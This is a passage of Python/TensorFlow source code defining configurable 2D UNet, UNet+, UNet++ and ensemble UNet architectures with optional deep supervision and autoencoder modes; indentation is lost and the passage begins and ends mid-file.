# width: Input Image Width (y-dim) [Normally same as the x-dim i.e., Square shape]
# model_depth: Depth of the Model
# model_width: Width of the Model
# kernel_size: Kernel or Filter Size of the Input Convolutional Layer
# num_channel: Number of Channels of the Input Predictor Signals
# feature_number: Number of Features or Embeddings to be extracted from the AutoEncoder, only useful in the A_E Mode
# ds: Checks where Deep Supervision is active or not, either 0 or 1 [Default value set as 0]
# ae: Enables or diables the AutoEncoder Mode, either 0 or 1 [Default value set as 0]
# alpha: This Parameter is only for MultiResUNet, default value is 1
self.length = length
self.width = width
self.model_depth = model_depth
self.num_channel = num_channel
self.model_width = model_width
self.kernel_size = kernel_size
self.problem_type = problem_type
self.output_nums = output_nums
self.D_S = ds
self.A_E = ae
if len(argv) == 0 and ae == 1:
raise ValueError("Please Check the Input Parameters! Autoencoder mode was selected but arguments were not provided!")
elif len(argv) == 2 and ae == 0:
raise ValueError("Please Check the Input Parameters! Autoencoder mode was not selected but extra arguments were provided!")
elif len(argv) == 1 and ae == 1:
self.feature_number = argv[0]
elif len(argv) == 1 and ae == 0:
self.alpha = argv[0] # Alpha parameter, only for MultiResUNet
elif len(argv) == 2 and ae == 1:
self.feature_number = argv[0]
self.alpha = argv[1]
elif len(argv) > 2:
raise ValueError("Please Check the Input Parameters! More than 2 optional arguments are not expected!")
def UNet(self):
"""Variable UNet Model Design"""
if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
print("ERROR: Please Check the Values of the Input Parameters!")
convs = {}
levels = []
i = 1
# Encoding
inputs = tf.keras.Input((self.length, self.width, self.num_channel))
conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
pool = tf.keras.layers.MaxPooling2D(pool_size=2)(conv)
convs["conv%s" % i] = conv
for i in range(2, (self.model_depth + 1)):
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
pool = tf.keras.layers.MaxPooling2D(pool_size=2)(conv)
convs["conv%s" % i] = conv
# Collect Latent Features or Embeddings from AutoEncoders
if (self.A_E == 0) and (self.D_S == 0):
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
elif (self.A_E == 0) and (self.D_S == 1):
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
level0 = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(conv)
levels.append(level0)
elif (self.A_E == 1) and (self.D_S == 0):
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
elif (self.A_E == 1) and (self.D_S == 1):
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
level0 = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(conv)
levels.append(level0)
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Decoding
convs_list = list(convs.values())
deconv = Conv_Block(Concat_Block(upConv_Block(conv), convs_list[self.model_depth - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - 1))
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** (self.model_depth - 1))
for j in range(1, self.model_depth):
if self.D_S == 0:
deconv = Conv_Block(Concat_Block(upConv_Block(deconv), convs_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
elif self.D_S == 1:
level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth - j}')(deconv)
levels.append(level)
deconv = Conv_Block(Concat_Block(upConv_Block(deconv), convs_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Output
outputs = []
if self.problem_type == 'Classification':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
elif self.problem_type == 'Regression':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
if self.D_S == 1:
levels.append(outputs)
levels.reverse()
model = tf.keras.Model(inputs=[inputs], outputs=levels)
return model
def UNet_v2(self):
"""Variable UNet Model Design - Version 2"""
if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
print("ERROR: Please Check the Values of the Input Parameters!")
convs = {}
levels = []
i = 1
# Encoding
inputs = tf.keras.Input((self.length, self.width, self.num_channel))
conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
for i in range(2, (self.model_depth + 1)):
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
# Collect Latent Features or Embeddings from AutoEncoders
if (self.A_E == 0) and (self.D_S == 0):
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
elif (self.A_E == 0) and (self.D_S == 1):
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
level0 = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(conv)
levels.append(level0)
elif (self.A_E == 1) and (self.D_S == 0):
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
elif (self.A_E == 1) and (self.D_S == 1):
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
level0 = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(conv)
levels.append(level0)
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Decoding
convs_list = list(convs.values())
deconv = trans_conv2D(conv, self.model_width, 2 ** (self.model_depth - 1))
deconv = Conv_Block(Concat_Block(deconv, convs_list[self.model_depth - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - 1))
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** (self.model_depth - 1))
for j in range(1, self.model_depth):
if self.D_S == 0:
deconv = trans_conv2D(deconv, self.model_width, 2 ** (self.model_depth - j - 1))
deconv = Conv_Block(Concat_Block(deconv, convs_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
elif self.D_S == 1:
level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth - j}')(deconv)
levels.append(level)
deconv = trans_conv2D(deconv, self.model_width, 2 ** (self.model_depth - j - 1))
deconv = Conv_Block(Concat_Block(deconv, convs_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Output
outputs = []
if self.problem_type == 'Classification':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
elif self.problem_type == 'Regression':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
if self.D_S == 1:
levels.append(outputs)
levels.reverse()
model = tf.keras.Model(inputs=[inputs], outputs=levels)
return model
def UNetE(self):
"""Variable Ensemble UNet Model Design"""
if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
print("ERROR: Please Check the Values of the Input Parameters!")
convs = {}
levels = []
i = 1
# Encoding
inputs = tf.keras.Input((self.length, self.width, self.num_channel))
conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
for i in range(2, (self.model_depth + 1)):
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
# Collect Latent Features or Embeddings from AutoEncoders
if self.A_E == 0:
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
elif self.A_E == 1:
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Decoding
convs_list = list(convs.values())
if self.D_S == 1:
level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(convs_list[0])
levels.append(level)
deconvs = {}
for i in range(1, (self.model_depth + 1)):
for j in range(0, (self.model_depth - i + 1)):
if (i == 1) and (j == (self.model_depth - 1)):
deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(conv)), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
elif (i == 1) and (j < (self.model_depth - 1)):
deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(convs_list[j + 1])), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
elif i > 1:
deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(deconvs["deconv%s%s" % ((j + 1), (i - 1))])), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
if (self.D_S == 1) and (j == 0) and (i < self.model_depth):
level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth - i}')(deconvs["deconv%s%s" % (j, i)])
levels.append(level)
deconv = deconvs["deconv%s%s" % (0, self.model_depth)]
# Output
outputs = []
if self.problem_type == 'Classification':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
elif self.problem_type == 'Regression':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
if self.D_S == 1:
levels.append(outputs)
levels.reverse()
model = tf.keras.Model(inputs=[inputs], outputs=levels)
return model
def UNetE_v2(self):
"""Variable Ensemble UNet Model Design - Version 2"""
if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
print("ERROR: Please Check the Values of the Input Parameters!")
convs = {}
levels = []
i = 1
# Encoding
inputs = tf.keras.Input((self.length, self.width, self.num_channel))
conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
for i in range(2, (self.model_depth + 1)):
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
# Collect Latent Features or Embeddings from AutoEncoders
if self.A_E == 0:
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
elif self.A_E == 1:
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Decoding
convs_list = list(convs.values())
if self.D_S == 1:
level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(convs_list[0])
levels.append(level)
deconvs = {}
for i in range(1, (self.model_depth + 1)):
for j in range(0, (self.model_depth - i + 1)):
if (i == 1) and (j == (self.model_depth - 1)):
deconv = trans_conv2D(conv, self.model_width, 2 ** j)
deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
elif (i == 1) and (j < (self.model_depth - 1)):
deconv = trans_conv2D(convs_list[j + 1], self.model_width, 2 ** j)
deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
elif i > 1:
deconv = trans_conv2D(deconvs["deconv%s%s" % ((j + 1), (i - 1))], self.model_width, 2 ** j)
deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
if (self.D_S == 1) and (j == 0) and (i < self.model_depth):
level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth - i}')(deconvs["deconv%s%s" % (j, i)])
levels.append(level)
deconv = deconvs["deconv%s%s" % (0, self.model_depth)]
# Output
outputs = []
if self.problem_type == 'Classification':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
elif self.problem_type == 'Regression':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
if self.D_S == 1:
levels.append(outputs)
levels.reverse()
model = tf.keras.Model(inputs=[inputs], outputs=levels)
return model
def UNetP(self):
"""Variable UNet+ Model Design"""
if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
print("ERROR: Please Check the Values of the Input Parameters!")
convs = {}
levels = []
i = 1
# Encoding
inputs = tf.keras.Input((self.length, self.width, self.num_channel))
conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
for i in range(2, (self.model_depth + 1)):
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
# Collect Latent Features or Embeddings from AutoEncoders
if self.A_E == 0:
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
elif self.A_E == 1:
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Decoding
convs_list = list(convs.values())
if self.D_S == 1:
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth}')(convs_list[0])
levels.append(level)
deconvs = {}
for i in range(1, (self.model_depth + 1)):
for j in range(0, (self.model_depth - i + 1)):
if (i == 1) and (j == (self.model_depth - 1)):
deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(conv)), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
elif (i == 1) and (j < (self.model_depth - 1)):
deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(convs_list[j + 1])), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
elif i > 1:
deconv = Conv_Block(Concat_Block(deconvs["deconv%s%s" % (j, (i - 1))], upConv_Block(deconvs["deconv%s%s" % ((j + 1), (i - 1))])), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
if (self.D_S == 1) and (j == 0) and (i < self.model_depth):
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth - i}')(deconvs["deconv%s%s" % (j, i)])
levels.append(level)
deconv = deconvs["deconv%s%s" % (0, self.model_depth)]
# Output
outputs = []
if self.problem_type == 'Classification':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
elif self.problem_type == 'Regression':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
if self.D_S == 1:
levels.append(outputs)
levels.reverse()
model = tf.keras.Model(inputs=[inputs], outputs=levels)
return model
def UNetP_v2(self):
"""Variable UNet+ Model Design - Version 2"""
if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
print("ERROR: Please Check the Values of the Input Parameters!")
convs = {}
levels = []
i = 1
# Encoding
inputs = tf.keras.Input((self.length, self.width, self.num_channel))
conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
for i in range(2, (self.model_depth + 1)):
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
# Collect Latent Features or Embeddings from AutoEncoders
if self.A_E == 0:
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
elif self.A_E == 1:
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Decoding
convs_list = list(convs.values())
if self.D_S == 1:
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth}')(convs_list[0])
levels.append(level)
deconvs = {}
for i in range(1, (self.model_depth + 1)):
for j in range(0, (self.model_depth - i + 1)):
if (i == 1) and (j == (self.model_depth - 1)):
deconv = trans_conv2D(conv, self.model_width, 2 ** j)
deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
elif (i == 1) and (j < (self.model_depth - 1)):
deconv = trans_conv2D(convs_list[j + 1], self.model_width, 2 ** j)
deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
elif i > 1:
deconv = trans_conv2D(deconvs["deconv%s%s" % ((j + 1), (i - 1))], self.model_width, 2 ** j)
deconv = Conv_Block(Concat_Block(deconvs["deconv%s%s" % (j, (i - 1))], deconv), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
if (self.D_S == 1) and (j == 0) and (i < self.model_depth):
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth - i}')(deconvs["deconv%s%s" % (j, i)])
levels.append(level)
deconv = deconvs["deconv%s%s" % (0, self.model_depth)]
# Output
outputs = []
if self.problem_type == 'Classification':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
elif self.problem_type == 'Regression':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
if self.D_S == 1:
levels.append(outputs)
levels.reverse()
model = tf.keras.Model(inputs=[inputs], outputs=levels)
return model
def UNetPP(self):
"""Variable UNet++ Model Design"""
if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
print("ERROR: Please Check the Values of the Input Parameters!")
convs = {}
levels = []
i = 1
# Encoding
inputs = tf.keras.Input((self.length, self.width, self.num_channel))
conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
for i in range(2, (self.model_depth + 1)):
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
# Collect Latent Features or Embeddings from AutoEncoders
if self.A_E == 0:
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
elif self.A_E == 1:
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Decoding
convs_list = list(convs.values())
if self.D_S == 1:
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth}')(convs_list[0])
levels.append(level)
deconvs = {}
for i in range(1, (self.model_depth + 1)):
for j in range(0, (self.model_depth - i + 1)):
if (i == 1) and (j == (self.model_depth - 1)):
deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(conv)), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
elif (i == 1) and (j < (self.model_depth - 1)):
deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(convs_list[j + 1])), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
elif i > 1:
deconv_tot = deconvs["deconv%s%s" % (j, 1)]
for k in range(2, i):
deconv_temp = deconvs["deconv%s%s" % (j, k)]
deconv_tot = Concat_Block(deconv_tot, deconv_temp)
deconv = Conv_Block(Concat_Block(convs_list[j], deconv_tot, upConv_Block(deconvs["deconv%s%s" % ((j + 1), (i - 1))])), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
if (self.D_S == 1) and (j == 0) and (i < self.model_depth):
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth - i}')(deconvs["deconv%s%s" % (j, i)])
levels.append(level)
deconv = deconvs["deconv%s%s" % (0, self.model_depth)]
# Output
outputs = []
if self.problem_type == 'Classification':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
elif self.problem_type == 'Regression':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
if self.D_S == 1:
levels.append(outputs)
levels.reverse()
model = tf.keras.Model(inputs=[inputs], outputs=levels)
return model
def UNetPP_v2(self):
"""Variable UNet++ Model Design - Version 2"""
if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
print("ERROR: Please Check the Values of the Input Parameters!")
convs = {}
levels = []
i = 1
# Encoding
inputs = tf.keras.Input((self.length, self.width, self.num_channel))
conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
for i in range(2, (self.model_depth + 1)):
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
convs["conv%s" % i] = conv
# Collect Latent Features or Embeddings from AutoEncoders
if self.A_E == 0:
conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
elif self.A_E == 1:
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Decoding
convs_list = list(convs.values())
if self.D_S == 1:
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth}')(convs_list[0])
levels.append(level)
deconvs = {}
for i in range(1, (self.model_depth + 1)):
for j in range(0, (self.model_depth - i + 1)):
if (i == 1) and (j == (self.model_depth - 1)):
deconv = trans_conv2D(conv, self.model_width, 2 ** j)
deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
elif (i == 1) and (j < (self.model_depth - 1)):
deconv = trans_conv2D(convs_list[j + 1], self.model_width, 2 ** j)
deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
elif i > 1:
deconv_tot = deconvs["deconv%s%s" % (j, 1)]
for k in range(2, i):
deconv_temp = deconvs["deconv%s%s" % (j, k)]
deconv_tot = Concat_Block(deconv_tot, deconv_temp)
deconv = trans_conv2D(deconvs["deconv%s%s" % ((j + 1), (i - 1))], self.model_width, 2 ** j)
deconv = Conv_Block(Concat_Block(convs_list[j], deconv_tot, deconv), self.model_width, self.kernel_size, 2 ** j)
deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
deconvs["deconv%s%s" % (j, i)] = deconv
if (self.D_S == 1) and (j == 0) and (i < self.model_depth):
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth - i}')(deconvs["deconv%s%s" % (j, i)])
levels.append(level)
deconv = deconvs["deconv%s%s" % (0, self.model_depth)]
# Output
outputs = []
if self.problem_type == 'Classification':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
elif self.problem_type == 'Regression':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
if self.D_S == 1:
levels.append(outputs)
levels.reverse()
model = tf.keras.Model(inputs=[inputs], outputs=levels)
return model
def MultiResUNet(self):
''' 1D MultiResUNet with an option for Deep Supervision and/or being used as an AutoEncoder '''
if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
